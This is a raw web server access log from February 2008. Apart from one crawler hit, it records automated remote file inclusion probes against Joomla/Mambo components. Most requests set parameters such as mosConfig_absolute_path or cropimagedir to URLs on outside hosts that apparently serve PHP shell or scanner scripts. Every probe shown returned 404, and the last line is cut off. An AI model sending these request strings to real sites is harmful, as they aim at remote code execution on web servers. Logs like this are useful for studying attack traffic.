67.195.44.95 - - [04/Feb/2008:02:17:47 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.32.209.240 - - [04/Feb/2008:02:18:42 -0800] "GET /logs/access_070716.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.nutrienforma.com/cache/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.17.114.133 - - [04/Feb/2008:02:19:35 -0800] "GET //REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.17.114.133 - - [04/Feb/2008:02:19:36 -0800] "GET /logs//REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.233.11.163 - - [04/Feb/2008:02:19:56 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://coyotezk8.googlepages.com/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.11.163 - - [04/Feb/2008:02:19:57 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://coyotezk8.googlepages.com/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.202.116.18 - - [04/Feb/2008:02:22:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
64.202.116.18 - - [04/Feb/2008:02:22:12 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "galf.org"
200.17.114.133 - - [04/Feb/2008:02:23:02 -0800] "GET /logs/access_070709.log//REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:24:46 -0800] "GET /logs/access_070716.log/modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.176.226.180 - - [04/Feb/2008:02:24:59 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://amcloscabos.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
81.176.226.180 - - [04/Feb/2008:02:24:59 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://amcloscabos.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:29:04 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:29:05 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.131.95.54 - - [04/Feb/2008:02:32:36 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
216.131.95.54 - - [04/Feb/2008:02:32:37 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
82.102.11.34 - - [04/Feb/2008:02:33:58 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xdenguebds.iespana.es/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.102.11.34 - - [04/Feb/2008:02:33:59 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xdenguebds.iespana.es/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
18.55.2.206 - - [04/Feb/2008:02:46:27 -0800] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
18.55.2.206 - - [04/Feb/2008:02:46:28 -0800] "GET /index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:47:07 -0800] "GET /logs/access_070709.log/modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [04/Feb/2008:02:47:11 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
18.55.2.206 - - [04/Feb/2008:02:47:13 -0800] "GET /index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "galf.org"
18.55.2.206 - - [04/Feb/2008:02:47:13 -0800] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "galf.org"
83.172.150.28 - - [04/Feb/2008:02:49:33 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
83.172.150.28 - - [04/Feb/2008:02:49:33 -0800] "GET /logs/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
83.172.150.28 - - [04/Feb/2008:02:50:07 -0800] "GET /logs/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 2